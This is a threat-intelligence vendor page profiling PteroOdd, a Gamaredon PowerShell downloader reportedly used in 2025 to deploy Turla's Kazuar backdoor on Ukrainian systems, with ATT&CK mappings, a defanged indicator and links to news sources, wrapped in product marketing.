Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 2 actors

PteroOdd

PteroOdd is a Gamaredon malware family, described by ESET as one of several lightweight PowerShell-based downloaders added to the group’s toolkit in 2025. Its primary role is to fetch next-stage payloads, command-and-control information, or additional malware. Reporting links it to Gamaredon operations targeting Ukrainian entities, particularly government, military, and defense-related organizations, with likely initial access in broader campaigns coming from Gamaredon’s known spear-phishing activity and malicious LNK files on removable drives, although the specific initial vector for the cited incidents was not confirmed.

High-confidence reporting states that PteroOdd was used in incidents observed between February and June 2025 in which Gamaredon facilitated deployment of Turla’s Kazuar backdoor on compromised Ukrainian systems. In one documented chain, Gamaredon deployed PteroGraphin, which downloaded PteroOdd; PteroOdd then retrieved a payload from Telegraph to execute Kazuar. ESET also reported that PteroOdd and PteroPaste were used to deploy Kazuar v2 installers in April and June 2025, and that PteroOdd was present in cases where Gamaredon tooling appeared to help recover or restart Turla’s Kazuar access. This activity has been cited as technical evidence of operational collaboration between the Russia-aligned groups Gamaredon and Turla, with Gamaredon providing or maintaining access and Turla deploying the more advanced espionage implant.

Observed indicators and behaviors directly mentioned in the content include retrieval of payloads from Telegraph, contact with the domain eset.ydns[.]eu in at least one related sample, and use in chains where victim system information such as computer name, system drive volume serial number, and installed .NET versions was collected before or alongside Kazuar deployment. PteroOdd is part of Gamaredon’s broader Ptero* toolset and is consistently characterized as a simple downloader rather than a full-featured backdoor.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Gamaredon Group

The other five new tools - PteroDee, PteroCache, PteroDum, PteroOdd and PteroEffigy - are all lightweight downloaders that fetch the next payload, C2 information or additional malware.

via govinfosecuritygovinfosecurity.com
Turla

The researchers first spotted in February four systems infected with a Turla backdoor called Kazuar, which attackers appeared to recover or restart ... by using malware tools Gamaredon installed on the system, including PteroGraphin and PteroOdd. The researchers later identified three more systems on which Gamaredon tools PteroOdd and PteroPaste deployed Kazuar v2, in April and June.

via govinfosecuritygovinfosecurity.com
MITRE ATT&CK

Techniques & procedures

4 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566PhishingEvidence2

The group tracked as Gamaredon spent the first half of the year developing six new PowerShell-based downloaders and shifted focus in the second half to launching at least 35 spear-phishing campaigns.

Execution

2 techniques
T1059Command and Scripting InterpreterEvidence5

The group tracked as Gamaredon spent the first half of the year developing six new PowerShell-based downloaders.

T1059.001PowerShellEvidence1

The group tracked as Gamaredon spent the first half of the year developing six new PowerShell-based downloaders.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

The other five new tools - PteroDee, PteroCache, PteroDum, PteroOdd and PteroEffigy - are all lightweight downloaders that fetch the next payload, C2 information or additional malware.

INDICATORS OF COMPROMISE

IOCs tracked for this family

1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
1 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app9 months ago
ACTIVITY FEED

Recent activity

9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

9 SOURCESView more in app
govinfosecurityNews
Jun 25, 2026
Russia's Gamaredon Adapts Tactics to Target Ukraine

A lightweight downloader used to fetch next-stage payloads, command-and-control information, or additional malware.

Read more
malware newsNews
Jun 2, 2026
LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine - Malware Analysis - Malware Analysis, News and Indicators

Gamaredon tooling used to deploy Turla's Kazuar backdoor and support access restoration on compromised systems.

Read more
sentinelone labsNews
May 14, 2026
LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine | SentinelOne

Gamaredon tooling used to facilitate deployment of Turla’s Kazuar backdoor and support access on compromised systems.

Read more
trend micro researchNews
Oct 22, 2025
The Rise of Collaborative Tactics Among China-aligned Cyber Espionage Campaigns | Trend Micro (US)

Custom malware family attributed (in the cited reporting) to Gamaredon; described here as being used to deploy another malware payload (Kazuar).

Read more
+5 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching1

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping4

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.